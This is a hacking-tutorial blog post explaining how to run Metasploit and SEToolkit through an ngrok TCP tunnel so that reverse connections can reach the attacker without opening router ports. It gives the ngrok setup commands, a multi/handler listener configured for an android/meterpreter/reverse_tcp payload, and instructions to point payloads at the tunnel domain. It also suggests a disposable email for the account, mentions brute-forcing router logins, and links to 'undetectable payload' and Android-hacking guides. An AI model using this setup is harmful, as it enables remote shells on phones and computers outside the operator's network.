How to Use Metasploit, SEToolkit Without Opening Ports Kali Linux

How to Use Metasploit, SEToolkit Without Opening Ports Kali Linux

Use hacking tools without opening ports: It can be quite annoying when you have limited access to ports on a network this can cause problems when pentesting as you can only test traffic within the same network. Unless of course, you could open the correct ports from within the router default administration panel for whatever reason sometimes access to administration panels are forbidden for example if you are using a mobile hotspot, another example corporate networks hide their panels and some home routers that play up even when the tester has access to opening the ports. Unless they just haven’t had the time to brute force a login yet, most Wireless routers will only allow the administrator to open ports today you will learn how to route your connections through an external secure tunnel this will allow us to use various pentesting tools such as Metasploit & SEToolkit outside our network.

  • First of all, create a disposable email address using getnada.com or similar disposable email service. getnada
  • Download ngrok In your browser go to ngrok.com and choose a download that suits your CPU architecture. Ngrok is a website that provides secure TCP tunnels for free. Once the download has completed extract the Zip archive and then cd into it for example “cd ngrok”

    ngrok1
    Download Page For Ngrok I will be using NGrok 32 Bit in this tutorial if your using a 64 bit modern CPU then download the 64-bit version of Ngrok.
  • Install your auth token (auth code below is an example copy auth token from ngrok.com account. Copy the authentication code from your account in ngrok.com we will be using this to authenticate our tunnel. You can do this by going to the folder where ngrok is stored and using .”/ngrok authtoken yourauthtokenhere ” The authentication code will then be saved.
    Example Authtoken

    ./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3

    ngrok2
    Screen Shot Shows Ngrok Auth Code (This account is not used by HackingVision and was deleted after this tutorial)

  • To create your first secure tunnel use the command below to set up a tunnel on port 80 I’m using HTTP port 80 for SET use whatever port you would like ngrok to tunnel through.
    ./ngrok http 80

    Screen Shot shows ngrok successfully running tunneling on HTTP port 80 the domain names in the screenshot are external domains of your tunnel.
  • Open the web interface at http://localhost:4040 to inspect and replay requests in a web browser of your choice. Starting Metasploit First you will need to start Ngrok using TCP commands as Metasploit will be using a reverse TCP connection. Open up a new terminal and start Metasploit using the command below../ngrok tcp 4444
    msfconsole

    Use your localhost to set srvhost and lhost.

    set lhost 0.0.0.0
    set lport 4444
    set uripath /

    Use port you used to set up ngrok as srvport this will help us with tunneling a Metasploit or SEToolkit session through the Internet.

    In this tutorial, I will set a handler up using settings above for Ngrok. Many reading this guide could be using complete different exploits to minify confusion we will be showing you set up a Reverse TCP Metapreter Listener. This will help later when setting up tunnels with other pentesting tools that use reverse connections.

    msfconsole
     msf  > use multi/handler
     msf exploit(handler) > set payload android/meterpreter/reverse_tcp
     msf exploit(handler) > set LHOST 0.0.0.0
     msf exploit(handler) > set srvhost 0.0.0.0
     msf exploit(handler) > set srvport 4444
     msf exploit(handler) > set uripath /
     msf exploit(handler) > exploit

    When your creating Payloads for Metasploit you will need to include your tunnel and also the port you are using for Ngrok.

    When creating payloads use the domain provided by Ngrok or you can ping the domain to receive an IP and use the IP address from the results use the same port for payload as your listener.

    Example SEToolkit

    setoolkit
    Screen Shot Below Shows SEToolkit set up to use an external host.

    This will work as a tunnel for many more pentesting tools this tutorial is not only limited to Metasploit and SEToolkit. Consider sharing this tutorial on social media & with your friends thank you for supporting HackingVision we have listed some links below to help you create your TCP tunnels and payloads.

    Feedback From Social Media

    facebook-ngrok


    Hack Android Mobile Phone using MSFVenom Kali Linux

    TheFatRat Tutorial – Generate Undetectable Payload FUD, Bypass Anti-Virus, Gain Remote Access